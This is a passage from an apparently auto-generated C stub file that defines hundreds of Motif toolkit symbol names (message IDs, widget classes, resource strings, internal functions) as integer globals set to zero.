int _XmMsgPanedW_0004 = 0;
int _XmMsgPanedW_0005 = 0;
int _XmMsgPixConv_0000 = 0;
int _XmMsgPrimitive_0000 = 0;
int _XmMsgProtocols_0000 = 0;
int _XmMsgProtocols_0001 = 0;
int _XmMsgProtocols_0002 = 0;
int _XmMsgRegion_0000 = 0;
int _XmMsgRepType_0000 = 0;
int _XmMsgRepType_0001 = 0;
int _XmMsgRepType_0002 = 0;
int _XmMsgResConvert_0001 = 0;
int _XmMsgResConvert_0002 = 0;
int _XmMsgResConvert_0003 = 0;
int _XmMsgResConvert_0005 = 0;
int _XmMsgResConvert_0006 = 0;
int _XmMsgResConvert_0007 = 0;
int _XmMsgResConvert_0008 = 0;
int _XmMsgResConvert_0009 = 0;
int _XmMsgResConvert_0010 = 0;
int _XmMsgResConvert_0011 = 0;
int _XmMsgResConvert_0012 = 0;
int _XmMsgResConvert_0013 = 0;
int _XmMsgResource_0001 = 0;
int _XmMsgResource_0002 = 0;
int _XmMsgResource_0003 = 0;
int _XmMsgResource_0004 = 0;
int _XmMsgResource_0005 = 0;
int _XmMsgResource_0006 = 0;
int _XmMsgResource_0007 = 0;
int _XmMsgResource_0008 = 0;
int _XmMsgResource_0009 = 0;
int _XmMsgResource_0010 = 0;
int _XmMsgResource_0011 = 0;
int _XmMsgResource_0012 = 0;
int _XmMsgResource_0013 = 0;
int _XmMsgRowColText_0024 = 0;
int _XmMsgRowColumn_0000 = 0;
int _XmMsgRowColumn_0001 = 0;
int _XmMsgRowColumn_0002 = 0;
int _XmMsgRowColumn_0003 = 0;
int _XmMsgRowColumn_0004 = 0;
int _XmMsgRowColumn_0005 = 0;
int _XmMsgRowColumn_0007 = 0;
int _XmMsgRowColumn_0008 = 0;
int _XmMsgRowColumn_0015 = 0;
int _XmMsgRowColumn_0016 = 0;
int _XmMsgRowColumn_0017 = 0;
int _XmMsgRowColumn_0018 = 0;
int _XmMsgRowColumn_0019 = 0;
int _XmMsgRowColumn_0020 = 0;
int _XmMsgRowColumn_0022 = 0;
int _XmMsgRowColumn_0023 = 0;
int _XmMsgRowColumn_0025 = 0;
int _XmMsgRowColumn_0026 = 0;
int _XmMsgRowColumn_0027 = 0;
int _XmMsgScale_0000 = 0;
int _XmMsgScale_0001 = 0;
int _XmMsgScale_0002 = 0;
int _XmMsgScale_0006 = 0;
int _XmMsgScale_0007 = 0;
int _XmMsgScale_0008 = 0;
int _XmMsgScale_0009 = 0;
int _XmMsgScaleScrBar_0004 = 0;
int _XmMsgScreen_0000 = 0;
int _XmMsgScreen_0001 = 0;
int _XmMsgScrollBar_0000 = 0;
int _XmMsgScrollBar_0001 = 0;
int _XmMsgScrollBar_0002 = 0;
int _XmMsgScrollBar_0003 = 0;
int _XmMsgScrollBar_0004 = 0;
int _XmMsgScrollBar_0005 = 0;
int _XmMsgScrollBar_0006 = 0;
int _XmMsgScrollBar_0007 = 0;
int _XmMsgScrollBar_0008 = 0;
int _XmMsgScrolledW_0004 = 0;
int _XmMsgScrolledW_0005 = 0;
int _XmMsgScrolledW_0006 = 0;
int _XmMsgScrolledW_0007 = 0;
int _XmMsgScrolledW_0008 = 0;
int _XmMsgScrolledW_0009 = 0;
int _XmMsgScrollFrameT_0000 = 0;
int _XmMsgScrollFrameT_0001 = 0;
int _XmMsgScrollVis_0000 = 0;
int _XmMsgSelectioB_0001 = 0;
int _XmMsgSelectioB_0002 = 0;
int _XmMsgSpinB_0003 = 0;
int _XmMsgSpinB_0004 = 0;
int _XmMsgSpinB_0005 = 0;
int _XmMsgSpinB_0006 = 0;
int _XmMsgSpinB_0007 = 0;
int _XmMsgSpinB_0008 = 0;
int _XmMsgSSpinB_0001 = 0;
int _XmMsgSSpinB_0002 = 0;
int _XmMsgSSpinB_0003 = 0;
int _XmMsgText_0000 = 0;
int _XmMsgTextF_0000 = 0;
int _XmMsgTextF_0001 = 0;
int _XmMsgTextF_0002 = 0;
int _XmMsgTextF_0003 = 0;
int _XmMsgTextF_0004 = 0;
int _XmMsgTextF_0006 = 0;
int _XmMsgTextFWcs_0000 = 0;
int _XmMsgTextIn_0000 = 0;
int _XmMsgTextOut_0000 = 0;
int _XmMsgTransfer_0000 = 0;
int _XmMsgTransfer_0002 = 0;
int _XmMsgTransfer_0003 = 0;
int _XmMsgTransfer_0004 = 0;
int _XmMsgTransfer_0005 = 0;
int _XmMsgTransfer_0006 = 0;
int _XmMsgTransfer_0007 = 0;
int _XmMsgVaSimple_0000 = 0;
int _XmMsgVaSimple_0001 = 0;
int _XmMsgVaSimple_0002 = 0;
int _XmMsgVendor_0000 = 0;
int _XmMsgVendor_0001 = 0;
int _XmMsgVendor_0002 = 0;
int _XmMsgVendor_0003 = 0;
int _XmMsgVisual_0000 = 0;
int _XmMsgVisual_0001 = 0;
int _XmMsgVisual_0002 = 0;
int _XmMsgXmIm_0000 = 0;
int _XmMsgXmRenderT_0000 = 0;
int _XmMsgXmRenderT_0001 = 0;
int _XmMsgXmRenderT_0002 = 0;
int _XmMsgXmRenderT_0003 = 0;
int _XmMsgXmRenderT_0004 = 0;
int _XmMsgXmRenderT_0005 = 0;
int _XmMsgXmString_0000 = 0;
int _XmMsgXmTabList_0000 = 0;
int xmMultiListClassRec = 0;
int XmMultiListDeselectItems = 0;
int XmMultiListDeselectRow = 0;
int XmMultiListGetSelectedRowArray = 0;
int XmMultiListGetSelectedRows = 0;
int XmMultiListMakeRowVisible = 0;
int XmMultiListSelectAllItems = 0;
int XmMultiListSelectItems = 0;
int XmMultiListSelectRow = 0;
int XmMultiListToggleRow = 0;
int XmMultiListUnselectAllItems = 0;
int XmMultiListUnselectItem = 0;
int xmMultiListWidgetClass = 0;
int _XmNavigate = 0;
int _XmNavigChangeManaged = 0;
int _XmNavigDestroy = 0;
int _XmNavigInitialize = 0;
int _XmNavigResize = 0;
int _XmNavigSetValues = 0;
int _XmNewTravGraph = 0;
int _XmNoneCursorIconQuark = 0;
int xmNotebookClassRec = 0;
int XmNotebookGetPageInfo = 0;
int _XmNotebook_manager_translations = 0;
int _XmNotebook_TabAccelerators = 0;
int xmNotebookWidgetClass = 0;
int _XmNotifyChildrenVisual = 0;
int _XmNumDSResources = 0;
int XmObjectAtPoint = 0;
int _XmOffsetArrow = 0;
int XmOptionButtonGadget = 0;
int XmOptionLabelGadget = 0;
int _XmOSAbsolutePathName = 0;
int _XmOSBuildFileList = 0;
int _XmOSBuildFileName = 0;
int _XmOSFileCompare = 0;
int _XmOSFindPathParts = 0;
int _XmOSFindPatternPart = 0;
int _XmOSGenerateMaskName = 0;
int _XmOSGetCharDirection = 0;
int _XmOSGetDirEntries = 0;
int _XmOSGetHomeDirName = 0;
int _XmOSGetInitialCharsDirection = 0;
int _XmOSGetLocalizedString = 0;
int XmOSGetMethod = 0;
int _XmOSInitPath = 0;
int _XmOSKeySymToCharacter = 0;
int _XmOSPutenv = 0;
int _XmOSQualifyFileSpec = 0;
int xmOutlineClassRec = 0;
int xmOutlineWidgetClass = 0;
int XMoveResizeWindow = 0;
int XMoveWindow = 0;
int xmPanedClassRec = 0;
int XmPanedGetPanes = 0;
int xmPanedWidgetClass = 0;
int xmPanedWindowClassRec = 0;
int xmPanedWindowWidgetClass = 0;
int _XmParentProcess = 0;
int XmParseMappingCreate = 0;
int XmParseMappingFree = 0;
int XmParseMappingGetValues = 0;
int XmParseMappingSetValues = 0;
int XmParsePicture = 0;
int XmParseTableFree = 0;
int _XmPathIsTraversable = 0;
int XmPictureDelete = 0;
int XmPictureDeleteState = 0;
int XmPictureDoAutoFill = 0;
int XmPictureGetCurrentString = 0;
int XmPictureProcessCharacter = 0;
int _XmPngGetImage = 0;
int _XmPopdown = 0;
int _XmPopup = 0;
int _XmPopupSpringLoaded = 0;
int _XmPopWidgetExtData = 0;
int _XmPostPopupMenu = 0;
int _XmPrimbaseClassExtRec = 0;
int _XmPrimClassExtRec = 0;
int xmPrimitiveClassRec = 0;
int _XmPrimitive_defaultTranslations = 0;
int _XmPrimitiveEnter = 0;
int _XmPrimitiveFocusIn = 0;
int _XmPrimitiveFocusInInternal = 0;
int _XmPrimitiveFocusOut = 0;
int _XmPrimitiveGetValuesHook = 0;
int _XmPrimitiveHelp = 0;
int _XmPrimitiveHighlightPixmapDefault = 0;
int _XmPrimitiveImportArgs = 0;
int _XmPrimitiveLeave = 0;
int _XmPrimitiveParentActivate = 0;
int _XmPrimitiveParentCancel = 0;
int _XmPrimitiveTopShadowPixmapDefault = 0;
int _XmPrimitiveUnmap = 0;
int xmPrimitiveWidgetClass = 0;
int _XmProcessDrag = 0;
int _XmProcessTraversal = 0;
int XmProcessTraversal = 0;
int xmProtocolClassRec = 0;
int xmProtocolObjectClass = 0;
int _XmPushB_defaultTranslations = 0;
int _XmPushBGadClassExtRec = 0;
int _XmPushB_menuTranslations = 0;
int _XmPushBPrimClassExtRec = 0;
int xmPushButtonClassRec = 0;
int xmPushButtonGadgetClass = 0;
int xmPushButtonGadgetClassRec = 0;
int xmPushButtonGCacheObjClassRec = 0;
int xmPushButtonWidgetClass = 0;
int _XmPushWidgetExtData = 0;
int _XmPutScaledImage = 0;
int XmQmotif = 0;
int XmQTaccessColors = 0;
int XmQTaccessTextual = 0;
int XmQTactivatable = 0;
int XmQTcareParentVisual = 0;
int _XmQTclipWindow = 0;
int XmQTcontainer = 0;
int XmQTcontainerItem = 0;
int XmQTdialogShellSavvy = 0;
int XmQTjoinSide = 0;
int XmQTmenuSavvy = 0;
int XmQTmenuSystem = 0;
int XmQTmotifTrait = 0;
int XmQTnavigator = 0;
int XmQTpointIn = 0;
int XmQTscrollFrame = 0;
int XmQTspecifyLayoutDirection = 0;
int XmQTspecifyRenderTable = 0;
int XmQTspecifyUnhighlight = 0;
int XmQTspecifyUnitType = 0;
int XmQTtakesDefault = 0;
int XmQTtoolTip = 0;
int XmQTtoolTipConfig = 0;
int XmQTtransfer = 0;
int XmQTtraversalControl = 0;
int _XmQualifyLabelLocalCache = 0;
int _XmQueryPixmapCache = 0;
int _XmQueueCount = 0;
int _XmQueueFree = 0;
int _XmQueueInit = 0;
int _XmQueuePop = 0;
int _XmRCAdaptToSize = 0;
int _XmRC_AddPopupEventHandlers = 0;
int _XmRC_AddToPostFromList = 0;
int _XmRCArmAndActivate = 0;
int _XmRC_CheckAndSetOptionCascade = 0;
int _XmRCColorHook = 0;
int _XmRCDoMarginAdjustment = 0;
int _XmRC_DoProcessMenuTree = 0;
int _XmRC_GadgetTraverseDown = 0;
int _XmRC_GadgetTraverseLeft = 0;
int _XmRC_GadgetTraverseRight = 0;
int _XmRC_GadgetTraverseUp = 0;
int _XmRCGetKidGeo = 0;
int _XmRC_GetLabelString = 0;
int _XmRC_GetMenuAccelerator = 0;
int _XmRC_GetMnemonicCharSet = 0;
int _XmRCGetTopManager = 0;
int _XmRC_KeyboardInputHandler = 0;
int _XmRCMenuProcedureEntry = 0;
int _XmRC_menuSystemRecord = 0;
int _XmRC_PostTimeOut = 0;
int _XmRCPreferredSize = 0;
int _XmRC_ProcessSingleWidget = 0;
int _XmRC_RemoveFromPostFromList = 0;
int _XmRC_RemoveFromPostFromListOnDestroyCB = 0;
int _XmRC_RemoveHandlersFromPostFromWidget = 0;
int _XmRC_RemovePopupEventHandlers = 0;
int _XmRCSetKidGeo = 0;
int _XmRC_SetMenuHistory = 0;
int _XmRC_SetOptionMenuHistory = 0;
int _XmRC_SetOrGetTextMargins = 0;
int _XmRCThinkAboutSize = 0;
int _XmRC_UpdateOptionMenuCBG = 0;
int _XmReadDragBuffer = 0;
int _XmReadDSFromStream = 0;
int _XmReadImageAndHotSpotFromFile = 0;
int _XmReadInitiatorInfo = 0;
int _XmReasonToMessageType = 0;
int _XmReCacheLabG = 0;
int _XmReCacheLabG_r = 0;
int _XmRecordEvent = 0;
int _XmRedisplayGadgets = 0;
int _XmRedisplayHBar = 0;
int _XmRedisplayLabG = 0;
int _XmRedisplayVBar = 0;
int _XmRegionClear = 0;
int _XmRegionComputeExtents = 0;
int _XmRegionCreate = 0;
int _XmRegionCreateSize = 0;
int _XmRegionDestroy = 0;
int _XmRegionDrawShadow = 0;
int _XmRegionEqual = 0;
int _XmRegionFromImage = 0;
int _XmRegionGetExtents = 0;
int _XmRegionGetNumRectangles = 0;
int _XmRegionGetRectangles = 0;
int _XmRegionIntersect = 0;
int _XmRegionIntersectRectWithRegion = 0;
int _XmRegionIsEmpty = 0;
int _XmRegionOffset = 0;
int _XmRegionPointInRegion = 0;
int _XmRegionSetGCRegion = 0;
int _XmRegionShrink = 0;
int _XmRegionSubtract = 0;
int _XmRegionUnion = 0;
int _XmRegionUnionRectWithRegion = 0;
int _XmRegisterConverters = 0;
int XmRegisterConverters = 0;
int _XmRegisterPixmapConverters = 0;
int XmRegisterSegmentEncoding = 0;
int _XmRemoveAllCallbacks = 0;
int _XmRemoveCallback = 0;
int XmRemoveFromPostFromList = 0;
int _XmRemoveGrab = 0;
int _XmRemoveHashEntry = 0;
int _XmRemoveHashIterator = 0;
int XmRemoveProtocolCallback = 0;
int XmRemoveProtocols = 0;
int XmRemoveTabGroup = 0;
int _Xm_RemQueue = 0;
int _XmRenderCacheGet = 0;
int _XmRenderCacheSet = 0;
int XmRenderTableAddRenditions = 0;
int XmRenderTableCopy = 0;
int XmRenderTableCvtFromProp = 0;
int XmRenderTableCvtToProp = 0;
int _XmRenderTableDisplay = 0;
int _XmRenderTableFindFallback = 0;
int _XmRenderTableFindFirstFont = 0;
int _XmRenderTableFindRendition = 0;
int XmRenderTableFree = 0;
int XmRenderTableGetDefaultFontExtents = 0;
int XmRenderTableGetRendition = 0;
int XmRenderTableGetRenditions = 0;
int XmRenderTableGetTags = 0;
int _XmRenderTableRemoveRenditions = 0;
int XmRenderTableRemoveRenditions = 0;
int _XmRenditionCopy = 0;
int _XmRenditionCreate = 0;
int XmRenditionCreate = 0;
int XmRenditionFree = 0;
int _XmRenditionMerge = 0;
int XmRenditionRetrieve = 0;
int XmRenditionUpdate = 0;
int _XmReOrderResourceList = 0;
int XmRepTypeAddReverse = 0;
int XmRepTypeGetId = 0;
int XmRepTypeGetNameList = 0;
int XmRepTypeGetRecord = 0;
int XmRepTypeGetRegistered = 0;
int _XmRepTypeInstallConverters = 0;
int XmRepTypeInstallTearOffModelConverter = 0;
int XmRepTypeRegister = 0;
int XmRepTypeValidValue = 0;
int _XmRequestNewSize = 0;
int _XmResetTravGraph = 0;
int _XmResizeHashTable = 0;
int _XmResizeObject = 0;
int _XmResizeWidget = 0;
int XmResolveAllPartOffsets = 0;
int XmResolveAllPartOffsets64 = 0;
int XmResolvePartOffsets = 0;
int _XmRestoreCoreClassTranslations = 0;
int _XmRestoreExcludedTearOffToToplevelShell = 0;
int _XmRestoreTearOffToMenuShell = 0;
int _XmRestoreTearOffToToplevelShell = 0;
int _XmRootGeometryManager = 0;
int _XmRowColumn_bar_table = 0;
int xmRowColumnClassRec = 0;
int _XmRowColumn_menu_table = 0;
int _XmRowColumn_menu_traversal_table = 0;
int _XmRowColumn_option_table = 0;
int xmRowColumnWidgetClass = 0;
int _XmSaccelerator = 0;
int _XmSacceleratorText = 0;
int _XmSactivateCallback = 0;
int _XmSadjustLast = 0;
int _XmSadjustMargin = 0;
int _XmSalignment = 0;
int _XmSallowOverlap = 0;
int _XmSallowResize = 0;
int _XmSanimationMask = 0;
int _XmSanimationPixmap = 0;
int _XmSanimationPixmapDepth = 0;
int _XmSanimationStyle = 0;
int _XmSapplyCallback = 0;
int _XmSapplyLabelString = 0;
int _XmSarmCallback = 0;
int _XmSarmColor = 0;
int _XmSarmPixmap = 0;
int _XmSarrowDirection = 0;
int xmSashClassRec = 0;
int _XmSash_defTranslations = 0;
int xmSashWidgetClass = 0;
int _XmSattachment = 0;
int _XmSaudibleWarning = 0;
int _XmSautomaticSelection = 0;
int _XmSautoShowCursorPosition = 0;
int _XmSautoUnmanage = 0;
int _XmSavailability = 0;
int _XmSaveCoreClassTranslations = 0;
int _XmSaveMenuProcContext = 0;
int _XmSblendModel = 0;
int _XmSblinkRate = 0;
int _XmSbottomAttachment = 0;
int _XmSbottomOffset = 0;
int _XmSbottomPosition = 0;
int _XmSbottomShadowColor = 0;
int _XmSbottomShadowPixmap = 0;
int _XmSbottomWidget = 0;
int _XmSbrowseSelectionCallback = 0;
int _XmSbuttonAccelerators = 0;
int _XmSbuttonAcceleratorText = 0;
int _XmSbuttonCount = 0;
int _XmSbuttonFontList = 0;
int _XmSbuttonMnemonicCharSets = 0;
int _XmSbuttonMnemonics = 0;
int _XmSbuttons = 0;
int _XmSbuttonSet = 0;
int _XmSbuttonType = 0;
int _XmSCAccelerator = 0;
int _XmSCAcceleratorText = 0;
int _XmSCAdjustLast = 0;
int _XmSCAdjustMargin = 0;
int xmScaleClassRec = 0;
int _XmScaleGetTitleString = 0;
int XmScaleGetValue = 0;
int XmScaleSetTicks = 0;
int XmScaleSetValue = 0;
int xmScaleWidgetClass = 0;
int _XmSCAlignment = 0;
int _XmSCAllowOverlap = 0;
int _XmScancelButton = 0;
int _XmScancelCallback = 0;
int _XmScancelLabelString = 0;
int _XmSCAnimationMask = 0;
int _XmSCAnimationPixmap = 0;
int _XmSCAnimationPixmapDepth = 0;
int _XmSCAnimationStyle = 0;
int _XmScanningCacheGet = 0;
int _XmScanningCacheSet = 0;
int _XmSCApplyLabelString = 0;
int _XmSCArmCallback = 0;
int _XmSCArmColor = 0;
int _XmSCArmPixmap = 0;
int _XmSCArrowDirection = 0;
int _XmScascadeButton = 0;
int _XmScascadePixmap = 0;
int _XmScascadingCallback = 0;
int _XmSCAtomList = 0;
int _XmSCAttachment = 0;
int _XmSCAudibleWarning = 0;
int _XmSCAutomaticSelection = 0;
int _XmSCAutoShowCursorPosition = 0;
int _XmSCAutoUnmanage = 0;
int _XmSCAvailability = 0;
int _XmSCBackgroundPixmap = 0;
int _XmSCBlendModel = 0;
int _XmSCBlinkRate = 0;
int _XmSCBooleanDimension = 0;
int _XmSCBottomShadowColor = 0;
int _XmSCBottomShadowPixmap = 0;
int _XmSCButtonAccelerators = 0;
int _XmSCButtonAcceleratorText = 0;
int _XmSCButtonCount = 0;
int _XmSCButtonFontList = 0;
int _XmSCButtonMnemonicCharSets = 0;
int _XmSCButtonMnemonics = 0;
int _XmSCButtons = 0;
int _XmSCButtonSet = 0;
int _XmSCButtonType = 0;
int _XmSCCallbackProc = 0;
int _XmSCCancelLabelString = 0;
int _XmSCChar = 0;
int _XmSCCharSetTable = 0;
int _XmSCChildHorizontalAlignment = 0;
int _XmSCChildHorizontalSpacing = 0;
int _XmSCChildPlacement = 0;
int _XmSCChildren = 0;
int _XmSCChildType = 0;
int _XmSCChildVerticalAlignment = 0;
int _XmSCClientData = 0;
int _XmSCClipWindow = 0;
int _XmSCColumns = 0;
int _XmSCCommandWindow = 0;
int _XmSCCommandWindowLocation = 0;
int _XmSCCompoundText = 0;
int _XmSCConvertProc = 0;
int _XmSCCursorBackground = 0;
int _XmSCCursorForeground = 0;
int _XmSCCursorPosition = 0;
int _XmSCCursorPositionVisible = 0;
int _XmSCDarkThreshold = 0;
int _XmSCDecimalPoints = 0;
int _XmSCDefaultButtonShadowThickness = 0;
int _XmSCDefaultButtonType = 0;
int _XmSCDefaultCopyCursorIcon = 0;
int _XmSCDefaultFontList = 0;
int _XmSCDefaultInvalidCursorIcon = 0;
int _XmSCDefaultLinkCursorIcon = 0;
int _XmSCDefaultMoveCursorIcon = 0;
int _XmSCDefaultNoneCursorIcon = 0;
int _XmSCDefaultPosition = 0;
int _XmSCDefaultSourceCursorIcon = 0;
int _XmSCDefaultValidCursorIcon = 0;
int _XmSCDeleteResponse = 0;
int _XmSCDesktopParent = 0;
int _XmSCDialogStyle = 0;
int _XmSCDialogTitle = 0;
int _XmSCDialogType = 0;
int _XmSCDirectory = 0;
int _XmSCDirectoryValid = 0;
int _XmSCDirListItemCount = 0;
int _XmSCDirListItems = 0;
int _XmSCDirListLabelString = 0;
int _XmSCDirMask = 0;
int _XmSCDirSearchProc = 0;
int _XmSCDirSpec = 0;
int _XmSCDisarmCallback = 0;
int _XmSCDoubleClickInterval = 0;
int _XmSCDragContextClass = 0;
int _XmSCDragDropFinishCallback = 0;
int _XmSCDragIconClass = 0;
int _XmSCDragInitiatorProtocolStyle = 0;
int _XmSCDragMotionCallback = 0;
int _XmSCDragOperations = 0;
int _XmSCDragOverMode = 0;
int _XmSCDragProc = 0;
int _XmSCDragReceiverProtocolStyle = 0;
int _XmSCDropProc = 0;
int _XmSCDropRectangles = 0;
int _XmSCDropSiteActivity = 0;
int _XmSCDropSiteEnterCallback = 0;
int _XmSCDropSiteLeaveCallback = 0;
int _XmSCDropSiteManagerClass = 0;
int _XmSCDropSiteOperations = 0;
int _XmSCDropSiteType = 0;
int _XmSCDropStartCallback = 0;
int _XmSCDropTransferClass = 0;
int _XmSCDropTransfers = 0;
int _XmSCEditable = 0;
int _XmSCEntryBorder = 0;
int _XmSCEntryClass = 0;
int _XmSCExportTargets = 0;
int _XmSCExposeCallback = 0;
int _XmSCExtensionType = 0;
int _XmSCFileListItemCount = 0;
int _XmSCFileListItems = 0;
int _XmSCFileListLabelString = 0;
int _XmSCFileSearchProc = 0;
int _XmSCFileTypeMask = 0;
int _XmSCFillOnArm = 0;
int _XmSCFillOnSelect = 0;
int _XmSCFilterLabelString = 0;
int _XmSCFontList = 0;
int _XmSCFONTLIST_DEFAULT_TAG_STRING = 0;
int _XmSCForegroundThreshold = 0;
int _XmSCGadgetPixmap = 0;
int _XmScheckButton = 0;
int _XmSCHelpLabelString = 0;
int _XmSCHighlightColor = 0;
int _XmSCHighlightOnEnter = 0;
int _XmSCHighlightPixmap = 0;
int _XmSCHighlightThickness = 0;
int _XmSchildHorizontalAlignment = 0;
int _XmSchildHorizontalSpacing = 0;
int _XmSchildPlacement = 0;
int _XmSchildPosition = 0;
int _XmSchildType = 0;
int _XmSchildVerticalAlignment = 0;
int _XmSCHorizontalDimension = 0;
int _XmSCHorizontalFontUnit = 0;
int _XmSCHorizontalInt = 0;
int _XmSCHorizontalPosition = 0;
int _XmSCHorizontalScrollBar = 0;
int _XmSCHot = 0;
int _XmSCICCHandle = 0;
int _XmSCIconAttachment = 0;
int _XmSCImportTargets = 0;
int _XmSCIncrement = 0;
int _XmSCIncremental = 0;
int _XmSCIndicatorOn = 0;
int _XmSCIndicatorSize = 0;
int _XmSCIndicatorType = 0;
int _XmSCInitialDelay = 0;
int _XmSCInitialFocus = 0;
int _XmSCInputCreate = 0;
int _XmSCInputMethod = 0;
int _XmSCInvalidCursorForeground = 0;
int _XmSCIsAligned = 0;
int _XmSCIsHomogeneous = 0;
int _XmSCISO8859_DASH_1 = 0;
int _XmSCItemCount = 0;
int _XmSCItems = 0;
int _XmSCKeyboardFocusPolicy = 0;
int _XmSCKeySym = 0;
int _XmSCKeySymTable = 0;
int _XmSCLabelFontList = 0;
int _XmSCLabelInsensitivePixmap = 0;
int _XmSCLabelPixmap = 0;
int _XmSCLabelString = 0;
int _XmSCLabelType = 0;
int _XmSclientData = 0;
int _XmSCLightThreshold = 0;
int _XmSclipWindow = 0;
int _XmSCListLabelString = 0;
int _XmSCListMarginHeight = 0;
int _XmSCListMarginWidth = 0;
int _XmSCListSizePolicy = 0;
int _XmSCListSpacing = 0;
int _XmSCListUpdated = 0;
int _XmSCLogicalParent = 0;
int _XmSCMainWindowMarginHeight = 0;
int _XmSCMainWindowMarginWidth = 0;
int _XmSCManBottomShadowPixmap = 0;
int _XmSCManForegroundPixmap = 0;
int _XmSCManHighlightPixmap = 0;
int _XmSCManTopShadowPixmap = 0;
int _XmSCMappingDelay = 0;
int _XmSCMarginBottom = 0;
int _XmSCMarginHeight = 0;
int _XmSCMarginLeft = 0;
int _XmSCMarginRight = 0;
int _XmSCMarginTop = 0;
int _XmSCMarginWidth = 0;
int _XmSCMask = 0;
int _XmSCMaximum = 0;
int _XmSCMaxItems = 0;
int _XmSCMaxLength = 0;
int _XmSCMaxValue = 0;
int _XmSCMenuBar = 0;
int _XmSCMenuPost = 0;
int _XmSCMenuWidget = 0;
int _XmSCMessageProc = 0;
int _XmSCMessageWindow = 0;
int _XmSCMinimizeButtons = 0;
int _XmSCMinimum = 0;
int _XmSCMnemonic = 0;
int _XmSCMnemonicCharSet = 0;
int _XmSCMoveOpaque = 0;
int _XmSCMultiClick = 0;
int _XmSCMustMatch = 0;
int _XmSCMwmDecorations = 0;
int _XmSCMwmFunctions = 0;
int _XmSCMwmInputMode = 0;
int _XmSCMwmMenu = 0;
int _XmSCMwmMessages = 0;
int _XmSCNavigationType = 0;
int _XmSCNeedsMotion = 0;
int _XmSCNoMatchString = 0;
int _XmSCNoneCursorForeground = 0;
int _XmSCNoResize = 0;
int _XmSCNotifyProc = 0;
int _XmSCNumChildren = 0;
int _XmSCNumColumns = 0;
int _XmSCNumDropRectangles = 0;
int _XmSCNumDropTransfers = 0;
int _XmSCNumExportTargets = 0;
int _XmSCNumImportTargets = 0;
int _XmSCOffset = 0;
int _XmSCOkLabelString = 0;
int _XmScolumns = 0;
int _XmScommand = 0;
int _XmScommandChangedCallback = 0;
int _XmScommandEnteredCallback = 0;
int _XmScommandWindow = 0;
int _XmScommandWindowLocation = 0;
int _XmSconvertProc = 0;
int _XmSCOperationChangedCallback = 0;
int _XmSCOperationCursorIcon = 0;
int _XmSCOptionLabel = 0;
int _XmSCOptionMnemonic = 0;
int _XmSCOutputCreate = 0;
int _XmSCPacking = 0;
int _XmSCPageIncrement = 0;
int _XmSCPaneMaximum = 0;
int _XmSCPaneMinimum = 0;
int _XmSCPattern = 0;
int _XmSCPendingDelete = 0;
int _XmSCPopupEnabled = 0;
int _XmSCPositionIndex = 0;
int _XmSCPostFromButton = 0;
int _XmSCPostFromCount = 0;
int _XmSCPostFromList = 0;
int _XmSCPreeditType = 0;
int _XmSCPrimForegroundPixmap = 0;
int _XmSCProc = 0;
int _XmSCProcessingDirection = 0;
int _XmSCPromptString = 0;
int _XmSCProtocolCallback = 0;
int _XmSCPushButtonEnabled = 0;
int _XmSCQualifySearchDataProc = 0;
int _XmSCRadioAlwaysOne = 0;
int _XmSCRadioBehavior = 0;
int _XmSCRecomputeSize = 0;
int _XmSCRectangleList = 0;
int _XmSCRectangles = 0;
int xmScreenClass = 0;
int xmScreenClassRec = 0;
int _XmScreenGetOperationIcon = 0;
int _XmScreenGetSourceIcon = 0;
int _XmScreenGetStateIcon = 0;
int xmScreenObjectClass = 0;
int _XmScreenRemoveFromCursorCache = 0;
int _XmSCRepeatDelay = 0;
int _XmSCResizeCallback = 0;
int _XmSCResizeHeight = 0;
int _XmSCResizePolicy = 0;
int _XmSCResizeWidth = 0;
int xmScrollBarClassRec = 0;
int _XmScrollBar_defaultTranslations = 0;
int XmScrollBarGetValues = 0;
int XmScrollBarSetValues = 0;
int xmScrollBarWidgetClass = 0;
int xmScrolledWindowClassRec = 0;
int XmScrolledWindowSetAreas = 0;
int xmScrolledWindowWidgetClass = 0;
int _XmScrolledW_ScrolledWindowXlations = 0;
int XmScrollVisible = 0;
int _XmSCRowColumnType = 0;
int _XmSCRows = 0;
int _XmSCRubberPositioning = 0;
int _XmSCSashHeight = 0;
int _XmSCSashIndent = 0;
int _XmSCSashWidth = 0;
int _XmSCScaleHeight = 0;
int _XmSCScaleMultiple = 0;
int _XmSCScaleWidth = 0;
int _XmSCScroll = 0;
int _XmSCScrollBarDisplayPolicy = 0;
int _XmSCScrollBarPlacement = 0;
int _XmSCScrolledWindowMarginHeight = 0;
int _XmSCScrolledWindowMarginWidth = 0;
int _XmSCScrollingPolicy = 0;
int _XmSCScrollSide = 0;
int _XmSCSelectColor = 0;
int _XmSCSelectedItemCount = 0;
int _XmSCSelectedItems = 0;
int _XmSCSelectInsensitivePixmap = 0;
int _XmSCSelectionArrayCount = 0;
int _XmSCSelectionLabelString = 0;
int _XmSCSelectionPolicy = 0;
int _XmSCSelectionType = 0;
int _XmSCSelectPixmap = 0;
int _XmSCSelectThreshold = 0;
int _XmSCSeparatorOn = 0;
int _XmSCSeparatorType = 0;
int _XmSCSet = 0;
int _XmSCShadowThickness = 0;
int _XmSCShadowType = 0;
int _XmSCShellHorizDim = 0;
int _XmSCShellHorizPos = 0;
int _XmSCShellUnitType = 0;
int _XmSCShellVertDim = 0;
int _XmSCShellVertPos = 0;
int _XmSCShowArrows = 0;
int _XmSCShowAsDefault = 0;
int _XmSCShowSeparator = 0;
int _XmSCShowValue = 0;
int _XmSCSimpleCheckBox = 0;
int _XmSCSimpleMenuBar = 0;
int _XmSCSimpleOptionMenu = 0;
int _XmSCSimplePopupMenu = 0;
int _XmSCSimplePulldownMenu = 0;
int _XmSCSimpleRadioBox = 0;
int _XmSCSizePolicy = 0;
int _XmSCSliderSize = 0;
int _XmSCSource = 0;
int _XmSCSourceCursorIcon = 0;
int _XmSCSourceIsExternal = 0;
int _XmSCSourcePixmapIcon = 0;
int _XmSCSourceWidget = 0;
int _XmSCSourceWindow = 0;
int _XmSCSpacing = 0;
int _XmSCStartTime = 0;
int _XmSCStateCursorIcon = 0;
int _XmSCStringDirection = 0;
int _XmSCTearOffModel = 0;
int _XmSCTextFontList = 0;
int _XmSCTextString = 0;
int _XmSCTextValue = 0;
int _XmSCTitleString = 0;
int _XmSCTopCharacter = 0;
int _XmSCTopItemPosition = 0;
int _XmSCTopLevelEnterCallback = 0;
int _XmSCTopLevelLeaveCallback = 0;
int _XmSCTopShadowColor = 0;
int _XmSCTopShadowPixmap = 0;
int _XmSCTransferProc = 0;
int _XmSCTransferStatus = 0;
int _XmSCTraversalOn = 0;
int _XmSCTraversalType = 0;
int _XmSCTreeUpdateProc = 0;
int _XmSCTroughColor = 0;
